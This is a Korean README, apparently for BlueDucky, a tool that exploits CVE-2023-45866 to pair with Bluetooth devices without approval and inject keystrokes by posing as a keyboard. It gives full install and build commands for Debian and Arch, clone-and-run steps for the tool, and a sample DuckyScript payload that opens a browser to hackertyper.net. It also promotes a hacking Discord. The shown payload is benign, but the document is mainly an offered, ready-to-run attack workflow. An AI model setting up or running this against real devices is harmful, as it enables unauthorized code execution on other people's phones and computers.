
BlueDucky는 블루투스 취약점, 특히 CVE-2023-45866을 악용하여 공격자가 대상 장치에 키 입력을 주입할 수 있게 합니다. 공격자의 장치는 블루투스 키보드로 위장하여 사용자 승인 없이 암호화된 연결을 설정합니다. BlueDucky 도구는 이 과정을 자동화합니다.
HackNexus의 모든 분들께 감사드립니다. VC에 꼭 참여하세요! https://discord.gg/HackNexus
참고: 저는 라즈베리 파이 외의 노트북이나 다른 기기에서 테스트할 수 없습니다. 이로 인해 발생하는 문제는 여러분들끼리 해결하셔야 합니다. 어댑터를 구매할 추가 자금이 없기 때문입니다.
🚨 CVE-2023-45866 - BlueDucky 구현 (DuckyScript 사용)
🔓 인증되지 않은 피어링으로 인한 코드 실행 (HID 키보드 사용)
BlueDucky는 블루투스 기기의 취약점을 악용하기 위한 강력한 도구입니다. 이 스크립트를 실행하면 다음을 수행할 수 있습니다:
저는 기본 블루투스 모듈을 사용하는 라즈베리 파이 4에서 이를 성공적으로 실행했습니다. 다양한 휴대폰에서 작동하며, 뉴질랜드 브랜드인 Vodafone은 흥미롭게도 예외입니다.
# update apt
sudo apt-get update
sudo apt-get -y upgrade
# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
git gcc python3-pip python3-setuptools \
python3-pydbus
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
# update pacman & packages
sudo pacman -Syyu
# install dependencies
# since arch doesn't separate lib packages: libbluetooth-dev included in bluez package
sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \
python-setuptools python-pydbus python-dbus
git gcc python-pip \
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py
또는,
pip3 install -r requirements.txt
🚧 작업 진행 중:
REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
REM Opens a private browser to hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300